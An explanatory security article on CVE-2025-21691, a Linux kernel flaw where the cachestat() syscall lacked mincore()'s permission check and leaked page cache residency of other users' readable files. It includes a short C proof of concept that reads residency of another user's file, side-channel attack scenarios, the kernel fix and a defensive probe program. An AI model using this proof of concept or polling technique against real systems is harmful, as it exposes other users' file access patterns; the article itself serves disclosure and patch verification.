CVE-2025-21691 is a Linux kernel vulnerability that let unprivileged processes query page cache residency statistics for files they could read but neither owned nor could write. It arose from a missing permission check in the cachestat() syscall, a recent addition designed to give programs fast, convenient access to information about which parts of a file are resident in memory. Let's break down what happened, how attackers could abuse it, how the kernel community reacted, and how it was fixed.

What is cachestat()?

Before cachestat() existed, the main way to check page cache residency (whether a section of a file is currently in RAM) was mincore(). This required mmap()ing the file into process memory first, which was slow and awkward for anything larger than a few pages.

To solve this, commit cf264e1329fb introduced the cachestat() syscall (merged in Linux 6.5). Instead of mapping, it takes an open file descriptor and a byte range and returns residency counters directly (cached, dirty, under writeback, evicted, recently evicted), making life simpler for monitoring tools and database software.

The Bug: Missing Permission Check

However, cachestat() missed an important step. The older syscall, mincore(), had been hardened back in 2019 (commit 134fca9063ad) to be conservative: it reveals real residency information only if you own the file or could open it for writing; for anyone else it simply reports every page as resident. That change was a response to page-cache side-channel attacks that used residency as a signal of other users' activity.

The new cachestat() code did not carry that check over. Any user with read access could obtain precise residency information for any file they could open, even though they had no business knowing which parts of it were in the page cache. In multi-user or containerized environments, this leaks information about other users' activity and re-opens the side channel that the mincore() hardening had closed.

Example Exploit

Suppose user alice has a file only she modifies, but everyone else can read.

Without this patch, *any user* could run cachestat() against Alice's file. glibc has no wrapper, so the call goes through syscall(); the struct definitions come from the Linux 6.5+ UAPI header linux/mman.h:

// PoC: query page-cache residency of a world-readable file we don't own
#include <fcntl.h>
#include <stdio.h>
#include <sys/syscall.h>
#include <unistd.h>
#include <linux/mman.h>  /* struct cachestat_range, struct cachestat (Linux >= 6.5 UAPI) */

int main(void) {
    int fd = open("/home/alice/.secret_data", O_RDONLY);
    struct cachestat_range range = { .off = 0, .len = 4096 };  /* first page only */
    struct cachestat cs;

    /* glibc has no wrapper, so use the raw syscall; flags must be 0 */
    if (fd >= 0 && syscall(SYS_cachestat, fd, &range, &cs, 0) == 0)
        printf("Cached pages: %llu\n", (unsigned long long)cs.nr_cache);
    else
        perror("cachestat");  /* EPERM on a patched kernel */
    return 0;
}

cachestat() does not report timestamps, but by polling it an attacker can watch pages of Alice's file move into and out of the cache, and from that infer when she (or a service acting for her) read which parts of it. Run against a shared database's files, the same polling reveals access patterns across users.

Attack Scenarios

- Privacy Leaks: Malicious users could infer access patterns for confidential files, learning when others are reading them and which regions they touch.
- Side-channel Attacks: Attackers could monitor which files (or pages of a file) are cached before and after a victim's operations, inferring which code paths, libraries or database regions the victim exercised. This is the class of page-cache side channel that motivated the mincore() hardening.
- Cross-tenant Leaks: In cloud or containerized hosting where tenants share a page cache, a user could learn about other tenants' activity. This is an information leak, not a container escape.

The Fix: Proper Permission Checks

To fix CVE-2025-21691, Linux developers applied the same conservative permission checking from mincore() to cachestat().

Now you must own the file, hold CAP_FOWNER, or be able to write to it (either because the descriptor was opened for writing or because you could open it for writing) to see its cache details. Here is the core logic added (simplified):

// In the kernel's cachestat implementation (simplified): the same test mincore() uses
static bool can_do_cachestat(struct file *f)
{
	if (f->f_mode & FMODE_WRITE)                 /* fd was opened for writing */
		return true;
	if (inode_owner_or_capable(file_mnt_idmap(f), file_inode(f)))  /* owner, or CAP_FOWNER */
		return true;
	return file_permission(f, MAY_WRITE) == 0;   /* caller could open it for writing */
}

if (!can_do_cachestat(file))
	return -EPERM;

Unlike mincore(), which quietly reports every page as resident to callers who fail the test, cachestat() refuses outright with EPERM, so nobody can spy on the cached status of files they neither own nor could write.

Original cachestat() syscall:

cf264e1329fb - cachestat: implement cachestat syscall

mincore() hardening that cachestat() now mirrors:

134fca9063ad - mm/mincore.c: make mincore() more conservative

cachestat() permission check fix:

Linux patch discussion
Actual patch in mainline (patch id TBA)

What Should Users Do?

If you manage a multi-user, shared, or security-sensitive Linux system, update your kernel to include this patch as soon as possible. Only kernels that have cachestat() at all, i.e. 6.5 and later, are affected; the fix landed in mainline 6.13 and was backported to the affected stable series.
Check with your distro for the CVE-2025-21691 fix or backport. On running systems, apply the update and reboot (a kernel fix is not live until the new kernel is booted).
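A quick way to verify whether a running kernel is affected is to call cachestat() on a root-owned, world-readable file such as /etc/passwd from an unprivileged account: a vulnerable kernel answers, a patched kernel refuses with EPERM, and a pre-6.5 kernel has no such syscall. The probe below is an added example written for this article, not code from the kernel or the original post; it copies the UAPI struct layout so it builds on older headers, and the verdict logic is split out into classify() so it can be checked without a matching kernel. The target path and the euid handling (root holds CAP_FOWNER and passes the new check regardless) are this example's own assumptions.

```c
/* Probe for CVE-2025-21691 from user space (added example, not from the article).
 * Must run as an unprivileged user: root passes the fixed check via CAP_FOWNER. */
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <sys/syscall.h>
#include <unistd.h>

#ifndef SYS_cachestat
#define SYS_cachestat 451  /* same syscall number on every architecture */
#endif

/* Layout from include/uapi/linux/mman.h, copied so this compiles on pre-6.5 headers */
struct cachestat_range { uint64_t off, len; };
struct cachestat {
    uint64_t nr_cache, nr_dirty, nr_writeback, nr_evicted, nr_recently_evicted;
};

enum verdict { VULNERABLE, PATCHED, UNAFFECTED, INCONCLUSIVE };

/* Pure decision logic: rc/err are the syscall return value and errno,
 * euid is the caller's effective uid. Kept separate so it is unit-testable. */
enum verdict classify(long rc, int err, uid_t euid)
{
    if (euid == 0)
        return INCONCLUSIVE;   /* CAP_FOWNER satisfies the new check anyway */
    if (rc == 0)
        return VULNERABLE;     /* residency handed to a non-owner who cannot write */
    if (err == EPERM)
        return PATCHED;        /* can_do_cachestat() refused us */
    if (err == ENOSYS)
        return UNAFFECTED;     /* kernel without cachestat() (pre-6.5) */
    return INCONCLUSIVE;       /* EBADF, EOPNOTSUPP (e.g. hugetlbfs), seccomp, ... */
}

/* Run the real probe against a file we can read but neither own nor write */
enum verdict probe(const char *path)
{
    int fd = open(path, O_RDONLY);
    if (fd < 0)
        return INCONCLUSIVE;
    struct cachestat_range range = { .off = 0, .len = 4096 };  /* first page suffices */
    struct cachestat cs;
    errno = 0;
    long rc = syscall(SYS_cachestat, fd, &range, &cs, 0);      /* flags must be 0 */
    int err = errno;
    close(fd);
    return classify(rc, err, geteuid());
}

int main(void)
{
    static const char *names[] = { "VULNERABLE", "PATCHED", "UNAFFECTED", "INCONCLUSIVE" };
    const char *target = "/etc/passwd";  /* assumed root-owned 0644: readable, not ours */
    printf("%s: %s\n", target, names[probe(target)]);
    return 0;
}
```

Build with `cc -o cachestat-probe probe.c` and run it as a normal user. INCONCLUSIVE usually means you ran it as root or the chosen file is writable by you; pick a file the account cannot write and retry.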

Conclusion

CVE-2025-21691 is a classic case of "secure by default" mattering: a new interface re-exposed information that an older interface had already been taught to withhold. Even seemingly harmless system calls can become privacy leaks or side channels if their permission checks aren't airtight. Kernel developers closed the gap by reusing the rule mincore() already enforced. As always, keep your systems patched!


*Stay safe—and never trust a new syscall without reading the fine print.*


References
- Linux Kernel Archive - cachestat patch
- Linux Kernel commit browser
- CVE-2025-21691 entry (populated soon)

Timeline

Published on: 02/10/2025 16:15:38 UTC
Last modified on: 05/04/2025 07:19:08 UTC